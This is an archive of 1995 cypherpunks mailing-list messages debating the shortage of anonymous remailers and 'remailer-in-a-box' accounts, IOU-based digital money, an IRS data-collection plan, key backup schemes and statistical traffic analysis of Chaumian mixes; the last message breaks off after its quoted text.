Message-ID: <v01510100ab45d3b87784@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have a server (WWW and ftp) that I would like to use for anything anyone
needs a place for. Drop me a line, or visit what's on my server (see
below). The part of the server that I will be putting cypherpunk related
material is password controled, and cannot be accessed unless you have am
account and password (assuming of course someone else doesn't break in and
figure someone's out that is... but I don't see how they could.)

This is just FYI for all and anyone!
Cheers,
- -J
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLyAj5UiLvmPjc4XdAQEJsAP+Pd7A/I01zZUaXUi7vhIbk3XHijrgAhjZ
1ZqIVuiOIfddnS8w+hJ1bKrxZFoY9YRzNLx0rliBckEn+HVYOl4+qQQjZ3TqjhDw
FULRRD6DGS85ZLZ/rwKrlyrSPY6YywgzgyzlZcUa/UtQ9Ll66NA4R6c7VWQB+4K7
qBuOUaOWvV0=
=XXIw
-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's January 29th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 15:20:55 PST
To: rishab@dxm.ernet.in
Subject: Re: The Remailer Crisis
In-Reply-To: <gate.1uq0yc1w165w@dxm.ernet.in>
Message-ID: <199501202316.PAA19895@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


rishab@dxm.ernet.in wrote:

> Tim urges recently that we need to do something about the "remailer crisis."
> 
> I remember Sameer once mentioning that he could set up remailer-in-a-box 
> accounts for possibly anonymous 'sponsors' who'd be the legal owners therefore
> indemnifying Sameer (the tolerant sysadmin) of responsibility. I know he allows
> 'remail-to-yourself' blind-server accounts for $10 / meg or something. That's
> probably a bit expensive for a sponsor of a public remailer (any stats on 
....

I of course agree with everything Rishab just said, because I've made
these points repeatedly over the last year or so. The
"remailer-in-a-box" was even my coinage, though I make no claims to
working on it more than just proposing some ideas.

I mention this because I sense a fair amount of frustration by many of
us that the same ideas keep coming up, keep getting general support,
but don't move along further. I've certainly felt this, and I know
others have, too.

(I sometimes think that nearly all messages here are just skimmed by
the readers, so the same stuff keeps bubbling up over and over again.)

Yet I'm not pointing a finger at the remailer operators or anyone
else. The problems are systemic, related to why things don't get done.

In any case, I strongly urge--and have several times now--that the act
of owning or operating  a site be explicity disconnected from the act
of having an account that does remailing.

Sites/Owners that allow remailing accounts ARE NOT THE SAME AS
accounts/owners that actually do the remailing! 

Further, there is no legal requirement (U.S.) that accounts be
"identifiable" publically--and probably no legal requirement that
accounts be identifiable at _all_. Thus, I could buy (Rishab's
"sponsor") a remailer account on foo.bar for some amount of money,
paid with paper currency sent to the remailer (just to help defray
costs, not as a sophisticated "paid remailer" scheme).

(And if charges of abuse, or legal letters from the Church of Aptical
Foddering, cause the site owner to "shut down" account
remailer73@foo.bar, then a new account, remailer121@foo.bar can be
instantiated immediately. Nothing illegal about this, unless the site
itself is (somehow) declared to be a contributory nuisance or somesuch.)

For reasons which should be apparent to all, having my name, or any
other name, attached to a remailer (e.g., "Tim-Remailer@foo.bar")
could invite deliberate attacks, spams, etc. Better to have remailers
have no such flags or invitations, a point several of you have also
commented on (in terms of picking domain names that are not
inflammatory or that will not trigger local scrutiny).

Like Duncan F., I will be willing to sponsor or buy some remailer
accounts. How many I sponsor will depend on the price, features,
reliabillity, etc. (Please do not post "Hey, I'm willing to do this,
so send me your $100 now." messages....for obvious reasons.)

I am waiting for such services to be actually, formally, solidly
announced, not just casual remarks that it might be possible. And of
course the software should be "ready to wear," port-a-potty, so that
the remailer account owner does nothing more than pay for the account.

(Aside: I strongly recommend that some emergent naming conventios be
discussed. For example, the "remailers-in-a-box" may need to be "no
frills" remailers, with no errors reported to the sender, no help to
those who send the wrong instructions, no hand-holding, and even _no
further contact_ between those who sponsored/bought the accounts and
the account itself! This could be marked as "anon-nf-137@foo.bar,"
meaning, an anon account, no frills, number 137 (of many more,
hopefully). And so on.)

And it will also depend on site reliability, uptime, etc. One site I
would otherwise be tempted to sponsor a remailer account on recently
took 5 days to forward a test message, so the problems are
apparent. (I believe remailer operators need to _promote_ their sites,
by citing uptimes, features, policies....but this is another one of
those ideas that keeps coming up over and over again, from various
people.)

The "crisis" I am talking about is that we are down to a handful of
sites, down from nearly 20 at one time, and with no apparent upward
trend in numbers.

Separating the act of having the courage/dedication to allow remailers
from the act of operating remailers out of accounts is the key.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 20 Jan 95 15:55:31 PST
To: cypherpunks@toad.com
Subject: Why emoney?  Why not a web of debt?
Message-ID: <199501202354.PAA13275@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


  [summary -- digital silk road along a web of debt-trust]

  Umm... money is not anything mystical -- it is just a convienient
way to trade and settle debts.  It was invented to solve the hassels
of trading a pound of butter, for a box of eggs, that for a tightly
woven basket, and finaly that for the gun you wanted in the first
place.  Yuch! accounting!!

  But electronic computers are good at checking out these kinds of
chains automatically.  Suppose there were a web of debt-trust.  Each
person would indicate the other people who's iou's they will accept
(and the amount they would be willing to take).  Thus I might take (up
to $10 of) Jo's, who might take Carol's who might take Terry's, etc.

  To buy something from me online, you will need to produce an IOU
from Jo, Carol or Terry.  I would hand it to Jo for verification.  Jo
would accept it or reject it (perhaps after talking to some other
folks online).  If it were a CarolIOU, or a TerryIOU I would insist Jo
trade it for a JoIOU.  All the details could be hidden behind a nice
little GUI.

  Jo and I would continuously balance the books between us by trading
JoIOUs for NoybIOU's.  After a while one of us might well end up with
enough extra IOUs that we want to get paid.  Perhaps the other would
perform services directly, or pay FRN's or gold, or whatever.

  If one of my friends wasn't able run an online IOU server, I could
probably trade things with my friend for IOU's.  Not that I'm running
a bank or any thing.

  With out every one being on line though I don't see an easy way to
prevent double spending.  Is there a offline multiple exchange token
system invented yet?

  Noyb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Repenning <jackr@dblues.engr.sgi.com>
Date: Fri, 20 Jan 95 17:19:40 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <199501202354.PAA13275@jobe.shell.portal.com>
Message-ID: <16152.790650879@dblues.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain



Recently, someone wrote:

  But electronic computers are good at checking out these kinds of
  chains automatically.

Not that good.  Loss of connectivity, limited bandwidth, and
cumulative table size would all make this impractical very
quickly, I think.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Feuer <adamfast@seanet.com>
Date: Fri, 20 Jan 95 17:22:20 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <ab46056806021004ab8a@[132.162.201.201]>
Message-ID: <Pine.NXT.3.91.950120171115.12961A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain



Noyb asks if there are offline methods of IOU-token exchange...

  well, one way of doing it is LETS, the Local Exchange Trading System-- a
non-computerized way of exchanging value in a community. it doesn't
exactly use money. there are thousands of LETS's worldwide, i've never
used one and don't know how they work in practice, tho i'd like to find
out! they seem like a good idea. it seems like the ideas could be 
extended to the net-- there seems to be a synergy with digital 
signatures, etc.
   a good place to find info about LETS is: 

LETSystems - the Home Page

-adam
adamfast@seanet.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 20 Jan 95 17:45:41 PST
To: cypherpunks@toad.com
Subject: Remailers-in-a-box
Message-ID: <199501210129.AA01692@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Tim May wrote:

> I am waiting for such services to be actually, formally, solidly
> announced, not just casual remarks that it might be possible. And of
> course the software should be "ready to wear," port-a-potty, so that
> the remailer account owner does nothing more than pay for the account.

In this model, who deals with mailbombs/spams/requests for address blocks?
It is this sort of administrivia (plus the threat of liability) that
makes running a remailer troublesome, not a lack of someone's $20/month.

I think it's disingenuous to say that "X pays the bills for the network
link; X purchased the hardware and keeps it running; the box is in X's
house/office; X is the person who reads complaint mail and responds (or
fails to); but because Y sends X $20/month, the remailer (and attendant
liability for its mis/use) belongs to Y." I realize that there's a 
certain formal logic to it, but I don't think that anyone - not courts,
and not the world-in-general - is going to pay attention to that 
formalism when it's clear that a machine essentially under the control
of X is being used for 'antisocial' means.

I'm seriously considering offering this sort of remailer-in-a-box
thing, but there's a certain amount of hassle associated with running
a remailer. It can be shifted to different parties, but it must be
paid for one way or another.  

I guess it'd be possible to treat remailers as disposable - when one
had pissed off enough people, it could be abandoned - but this lack
of long-term reliability seems poor.
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyBjVX3YhjZY3fMNAQEI3QP/YdqBbhn5k4Q+NtD3zoJCG7qIfGaQqogH
AFFmItuU46rFQHHSxPl+p4fNmX+32yEva04ORq28NWPKggXiXhwN+LQDshWomSU8
gXkysIPdGeogSDxP6+JxXatE81TpuCjOtbGH3KlmCNaRbB0685zBVB7Oj1O/D5it
zqM9JuV8yAE=
=EQY5
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Fri, 20 Jan 95 15:34:06 PST
To: cypherpunks@toad.com
Subject: Spam Busters!
Message-ID: <Pine.3.89.9501201710.B13927-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
-----BEGIN PGP SIGNED MESSAGE-----
 
 
Yeah, the numbers should be higher.  This was just a hypothetical!
 
nzook@bga.com said:
 
>   There is little, if anything, we can do to stop a chained, PGP'ed mail
> bomb, "This is mail bomb number XXX.  Boom!" It is therefore in our best
> interest to not encourage children to send such messages in such a 
way.  I
> believe Homer's message was erroneous for this reason.
 
People, please!  Before critisizing a method, look at the threat model!  I
plainly stated that my method was not intended to deal with real trouble.
 
tcmay: "The From: line is notoriously misleading".
 
But it still gives enough that we need remailers in the first place, right?
The "From:" was a token.  It wasn't meant as a literal.  For id'ing
postmaster, all you need is the xx.xx.xx.xx, right?
 
jalicqui "Unless your remailer was the terminal remailer for a significant
number.."
 
But in a serious spam/mailbomb attack, someone would _have_ to get a bunch,
right?  With the changing session keys, and a chain, the best we could hope
for would be to stop it on its way out.  (or use for padding ;-)
 
Incidently, a per/customer volume limit would also control the binaries.
Since we have little hope of id'ing the true originator, we might have to
limit a site. (bad)  OTOH, if someone tried to send binaries, only to find
that they couldn't get more than 1M out an hour, they would probably give
up & go somewhere else.  We might also hit the chained pgp bomber this way,
as the messages would likely be fairly large?
 
 
XXX
 
But this all misses a point that I would like to stress.  We are in what
the military refers to as "low-intensity combat".  Right now, we don't have
a continuous stream of spam-bombs floating through our systems.  (Well, we
did, but jp shut down :-(( )  Right now, we (other than PRZ) don't have
serious legal troubles.  Right now, our remailers are too weak to be a
significant problem to the TLAs (any more than a forged From:).
 
The way to win a low-intensity battle is to avoid escalating unless you are
sure you can win.  Eventually, we will have to standardize packets.
Eventually, we will have to employ very sophisticated techniques to deal
with spam-bomb.  But maybe we don't do that today.  Maybe we do just enough
to catch a bunch of the most juvenile.  Then the next bunch is smarter.
Then we catch them.  We keep going.  You see, I doubt that we can take on
a spammer that knows the net as well as anyone here.  But I don't doubt
that word can get out that the remailers nail spammers.  Of course, we risk
becoming the latest challenge to the juvenile, but I think that this is far
less likely than it appears at first because we are, after all, "really
cool".
 
My suggestion is to avoid, for as long as possible, letting on to _anyone_
just how sophisticated our systems are, just how much can be done, until we
are sure we can win the unavoidable battles.
 
 
XXX
 
This also strongly points to per-line blocking of remailers.  Since the
necessary steps to catch a sUPer bomber appear to be impossible/
impractical, we must offer annon-blocking for those poor souls that request
it.  Perhaps annon-block for a month at a time.  This is part of that PR 
that we need to watch.
 
To put it another way, if our services make it easy(er) for someone to
engage in an activity that we oppose, and that can hurt (subjective)
someone else, we are facing a moral responsiblity for our actions.  We
should attempt to fulfill that responsibility.
 
I believe that the phone company even allows people to change numbers for
free if they are receiving harassing calls.  And we want to be better
though of than the phone company, right?
 
 
XXX
 
BTW, do you have to be a remailer operator to be on the list?  If not, I'ld
like to know how to subscribe...
 
 
Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.
 
Factors for modulous are not proven primes.  Key may be far weaker than
expected.  Encode at your own risk.
 
Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com>
Key fingerprint =  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLyBfUHmgMs8UcStNAQE7Ygf/Wg5+hKErgpqi+4J7jOAw97AitUnYn+z+
QJqAw4ar6hQEY/taC6ru5S8YjKYHwmXdR7n7YjSFjEy8aYwXSr4SaALICNhQsyrU
jcSuaMY0oUN2obYV6TxYtdVWaQVF9XBqW/8AlIcs+ZF4Yi7gqUdgf4aApuapW14e
drVi6PgV5ccg8a+wGBCdJhDy5AK0BJRtxUxtLDeb+MkaTOfk/ylLfBdbFV1iK7Ek
qDmpAZdd+FpwKoqBTm+jbCa/kemwFN5touLeLijRWjEuoqFK0x/YYRYsAjJUNqu/
Qt6YWqvat8t7UYlTauVsQ/9XJNxADxmWlrKaaQTxmsHrobq0h4s+RA==
=ykck
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 20 Jan 95 17:43:18 PST
To: cypherpunks@toad.com
Subject: Remailer In a Box available for beta testing
Message-ID: <199501210142.RAA28133@soda.CSUA.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text


	I finally got annoyed with Tim clamoring for a Remailer in a Box,
so I set it up just now... I just wrote it so there may be some problems
I haven't gotten rid of yet.

	If you want to run a remailer on c2.org:

1) Sign up for a shell account on http://www.c2.org/services/signup.html

2) Log into your account (via dialup [510-549-1383] or telnet [c2.org])
once it has been created.  (within a day.. I'll automate account creation
so it gets made within an hour soon, but right now I am doing it manually.)

3) If you wish, you can setup a .forward file to point to mailfilters
or to another account. 

4) Run the program /usr/local/lib/boxed-remailer/install_remail. The
remailer will be installed, and non-remailed mail will be acted upon
according to how the account was setup before you ran the program.

5) Answer the questions, they should be pretty simple.

	Once an account is created there is a one week free grace period.
If you'd like to continue the account you can pay for it.

	If you have problems and suggestions, make sure you mail me, and
I'll fix it. This is still in beta testing, so if you have problems I won't
disable the account waiting for payment until the problems are fixed.

$10 for one month, $27 for 3 months, $45 for 6 months.
--
sameer                                          Voice:   510-841-2014
Network Administrator                           Pager:   510-321-1014
Community ConneXion: The NEXUS-Berkeley         Dialin:  510-549-1383
http://www.c2.org (or login as "guest")                 sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Fri, 20 Jan 95 15:20:42 PST
To: cypherpunks@toad.com
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
Message-ID: <9501202311.AB09922@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:44 PM 1/20/95 CST, xpat@vm1.spcs.umn.edu wrote:
>Excerpts from : St Paul Pioneer Press, Jan 29, 1995
>
>"IRS plans to collect more data on individuals to nab tax cheats"

        [...]

Here's the text from the recent EPIC annoucement on this--it covers the 
exemption the IRS is claiming from the FOIA in a bit more detail (sorry if 
people have already seen this):

=======================================================================
[6] IRS Initiates Massive New Database
=======================================================================

On December 20, the Internal Revenue Service announced in the Federal
Register that it was planning a new database to monitor compliance of
taxpayers in a project entitled Compliance 2000.  The database would
contain information on all individuals in the U.S. who conduct certain
financial transactions and would be segmented by different criteria:

	Any individual who has business and/or financial
	activities. These may be grouped by industry, occupation,
	or financial transactions, included in commercial
	databases, or in information provided by state and local
	licensing agencies.

The new database will combine private and public sector databases in a
single searchable entity.  A number of federal financial databases
from the IRS will be enhanced with state, local and commercial
sources. The Federal Register notice describes the non-tax databases:

	Examples of other information would include data
	from commercial databases, any state's Department
	of Motor Vehicles (DMV), credit bureaus, state and
	local real estate records, commercial publications,
	newspapers, airplane and pilot information, U.S.
	Coast Guard vessel registration information, any
	state's Department of Natural Resources
	information, as well as other state and local
	records.  In addition, Federal government databases
	may also be accessed, such as, federal employment
	files, federal licensing data, etc.

Finally, even though the proposed system would use frequently
inaccurate "commercial databases" such as direct marketing records,
taxpayers would not be able to review their records to ensure that
they are accurate and up to date:  "This system is exempt from the
access and contest provisions of the Privacy Act."

EPIC is filing comments asking the IRS to reconsider its use of
commercial databases and to ensure that there are greater safeguards
on the collection and use of personal information.

A copy of the Federal Register notice is available at cpsr.org
/cpsr/privacy/epic/IRS_compliance_2000_notice_txt
Comments on the proposed system must be received by January 19, 1995,
and sent to Office of Disclosure, Internal Revenue Service, 1111 Conn.
Ave, NW, Washington, DC 20224. EPIC's Comments are available at
cpsr.org /cpsr/privacy/epic/epic_irs_compliance_2000_comments.txt

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 20 Jan 95 18:23:18 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <ab46056806021004ab8a@[132.162.201.201]>
Message-ID: <Pine.3.89.9501201850.A29683-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain



 At 6:54 PM 01/20/95, anonymous-remailer@shell.portal.com wrote:
> >  But electronic computers are good at checking out these kinds of
> >chains automatically.  Suppose there were a web of debt-trust.  Each
> >person would indicate the other people who's iou's they will accept
> >(and the amount they would be willing to take).  Thus I might take (up
> >to $10 of) Jo's, who might take Carol's who might take Terry's, etc.

On Fri, 20 Jan 1995, Jonathan Rochkind wrote:
> Certainly, that's what money is after all. Pretty much.  But how are you
> going to transfer these IOUs electronically in a way that is relatively
> fraud-proof? 

I believe that the point that anonymous was making is that if
everyone is their own bank and their own currency issuer,
then identity based cash is just as resistant to state power,
and perhaps more resistant, than anonymous cash.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Fri, 20 Jan 95 22:29:05 PST
To: cypherpunks@toad.com
Subject: Re: Key backup
In-Reply-To: <199501182358.SAA29305@bb.hks.net>
Message-ID: <2778lyczB0I7075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501182358.SAA29305@bb.hks.net>, you wrote:

> Variations on this theme (there are many) are encouraged. Have a friend
> check out a library book and let you stamp your key somewhere inside. It's
> the number of possible variations that make this seemingly impossible to
> attack. Apologies if this "secret ink" stuff is way off base  ;-) .
> 
> Most people (myself included) would opt for the "split and
> disguise" or "hidden/buried" key schemes where secret ink wouldn't add
> much security.

> 'Adam Shostack' was reported to have written:

> > If you want to hide bits, they
> > should be stripped of low entropy parts and hidden with a stego
> > program.
> 
> The idea was to use something other than magnetic media. A new and
> different optical encoding method could be devised to hide a key in a 
> halftone, but the barcode example was offered as one possibility using
> an existing standard. The basis for this thread was the perceived need
> for a relatively simple key backup system that didn't require the active
> participation of a whole hoard of people.

Pat Cadigan, in her novel SYNNERS, had the off-beat idea of having
crucial data encoded into graphical images and tattooed onto the skins
of beach bums.  

I've heard of worse ideas. . . .

                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLyBy+eVevBgtmhnpAQF2ogMAh5Br252k6h29mcNepsDfo0htW32AmcfX
6YpJZycKs95V3foxd5pdjtuPqdkEeI03n966g3TXRbgNSe3dX7je1h8b6wsDH9hF
CWsabq/Z5KgiRUIGHDrcEtKpsl0+Xf2y
=txNr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 19:07:08 PST
To: greg@ideath.goldenbear.com (Greg Broiles)
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501210129.AA01692@ideath.goldenbear.com>
Message-ID: <199501210301.TAA09022@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles wrote:

> Tim May wrote:
> 
> > I am waiting for such services to be actually, formally, solidly
> > announced, not just casual remarks that it might be possible. And of
> > course the software should be "ready to wear," port-a-potty, so that
> > the remailer account owner does nothing more than pay for the account.
> 
> In this model, who deals with mailbombs/spams/requests for address blocks?
> It is this sort of administrivia (plus the threat of liability) that
> makes running a remailer troublesome, not a lack of someone's $20/month.

In this model the owner of the machine (who is not himself a remailer,
only a seller of accounts) simply ignores all such issues of
mailbombs, spams, request for address blocks. He has a form letter
than says something like:

"I am not the initiator of any mail bombs, spams, or illegal mail. I
merely sell accounts, like private mail boxes. Some of the mail you
are objecting to may have originated on my system, some may merely
have passed through my system, just as mail passes through many
systems from sender to receiver. If you have problems, talk to the
sender, not to me. Under the ECPA I cannot even _look_ at the mail on
my system, and even if it were legal, I would not."


> I think it's disingenuous to say that "X pays the bills for the network
> link; X purchased the hardware and keeps it running; the box is in X's
> house/office; X is the person who reads complaint mail and responds (or
> fails to); but because Y sends X $20/month, the remailer (and attendant
> liability for its mis/use) belongs to Y." I realize that there's a 
> certain formal logic to it, but I don't think that anyone - not courts,
> and not the world-in-general - is going to pay attention to that 
> formalism when it's clear that a machine essentially under the control
> of X is being used for 'antisocial' means.

It likely buys a couple of years of protection, though. Currently the
remailer sites = remailer accounts, so they have little or no
protection.

I don't think "disingenuous" as very apt description. For one thing,
my proposal certainly doesn't make things any _worse_ for the true
remailers. 

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 19:09:29 PST
To: perry@imsi.com
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
In-Reply-To: <9501201859.AA06028@snark.imsi.com>
Message-ID: <199501210308.TAA09743@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:

> xpat@vm1.spcs.umn.edu says:
> > Excerpts from : St Paul Pioneer Press, Jan 29, 1995
> > 
> > Here's the kicker: "Although agency officials concede that some of
> > the data collected will be inaccurate, taxpayers will not be allowed
> > to review or correct it"                         ^^^^^^^^^^^^^^^^^^^
> > ^^^^^^^^^^^^^^^^^^^^^^^
> > So much for the FOIA.
> 
> The privacy act and FOIA make that more or less illegal -- if they are
> keeping information on you, with certain law enforcement related
> exceptions they have to let you see it.

The articles I've read on this new system ("Compliance 2000") make it
clear that the IRS will be buying data from non-governmental entities,
e.g., the direct marketing databases and the commercial credit
reporting agencies. This neatly skirts the FOIA, as the FOIA cannot be
used to force a private entity or corporation to reveal its own data
(which, as a libertarian, I am glad of....I wouldn't want folks
demanding to sift through my records, files, and dossiers).

This just extends the type of "subcontracting" to nominally private
entities that the intelligence community began many years ago. The
corporation, "Dossiers R Us," will be the "Air America" for our age.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Fri, 20 Jan 95 19:23:27 PST
To: greg@ideath.goldenbear.com>
Subject: RE: Remailers-in-a-box
Message-ID: <Chameleon.4.01.950120192306.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>I guess it'd be possible to treat remailers as disposable - when one
>had pissed off enough people, it could be abandoned - but this lack
>of long-term reliability seems poor.

Someone had posted a protocol scheme that would allow new remailers to
advertise their existence on a newsgroup, which would cause any number
of auto pinging "reputation" services to begin monitoring this new
remailer automatically.  Once reliability, etc., was established, the
reputation services would "add" this node to the remailernet.  Similar
actions would take place if a remailer just "went away".

Quality of service, features, etc., would be part of the advertisement,
and would result in a form of competition between remailers.  Similarly,
reputation services would have differing criteria for "blessing" a site,
which would result in a form of competition between the _reputation servers_
for a good reputation.

The key to this whole scheme is in the automation of the process.  Done
correctly, it would result in a self-organizing, self-healing ecology of
remailers, that would naturally gravitate toward providing the features
and services in most demand.

Yeah, sure.  Looks good on paper, anyway.  Lots of real-life hassles to 
work out, but it _probably_ could be made to work.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyB9001Diok8GKihAQEZAAP+MU2qaWZahpOgsdoyk7XuHvAnMbNGgalw
zJqLNz4H8knRINEZsDsTR7pIMbnhMWxlRfDtgXXNCE8KXvdCA3FkVyG4MItFn5vF
fQZxw9rg87m/B9YwEOEah9N4RhNXs2RHsB8dVinMkncw9REklWbGkydcxf0EvKkc
Y6JgzEkX54w=
=Tu9L
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 20 Jan 95 19:22:33 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: traffic analyzing Chaum's digital mix
In-Reply-To: <199501201624.IAA13926@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950120191922.22820B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 20 Jan 1995, Hal wrote:
 
> Another interesting aspect of your analysis is the possible role of
> latency.  Earlier I had thought of latency as primarily a way of doing
> mixing, an alternative or addition to batching which mixes messages
> without holding them up quite as much.  But in terms of this in/out
> analysis latency could play a part in blurring the batch boundaries,
> adding more uncertainty and making the job of the analyst harder so he
> would need more data to establish his scores.

Latency (by which I take to mean some kind of random delay) will 
probably make the analyst's job harder, but I suspect not by much.  The 
method of analysis I outlined earlier can be modified to apply to mixes 
that use random delay instead of batching as the method of mixing.  
Instead of adding up the number of times Alice's message to the mix is 
followed up by a message from the mix to a user, take the sum of the 
probabilities that each message the user receives is from Alice.

So you would do something like this for each user of the mix:
	  message #    probability this message came from Alice
		1                       0.000135
		2                       0
		3                       0.000012
		4                       0.004332

		     SUM:               0.004479

Each probability can be calculated from the statistical distribution of 
the delay time, the length of time between the Alice sending the last 
message to the mix and the user receiving a message from the mix, and 
the timing and number of other messages sent by the mix around this 
period of time.

This method is more general than the one I talked about earlier, since 
it is equivelent to the former method when you apply it to a batching 
mix (that is, the original Chaumian mix).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyB8YDl0sXKgdnV5AQHZxAQApKQgYfhGhBu+3QXzCEi1/3B55jgdHa6X
6ZeZQWZYjEhLXnOA6Z4SEHKjOVYpMHb+VkvW+vG+QZVR+cjajstg6HczwEguXjSX
ObTm2gaQGRFaUOD+0fUEWFxxkqNxYEL0hRAesX3TyGYI/MQ4WzysweCzCk75+Dm2
glKeTRgnFKo=
=36jW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 20 Jan 95 16:32:04 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney?  Why not a web of debt?
Message-ID: <ab46056806021004ab8a@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:54 PM 01/20/95, anonymous-remailer@shell.portal.com wrote:
>  But electronic computers are good at checking out these kinds of
>chains automatically.  Suppose there were a web of debt-trust.  Each
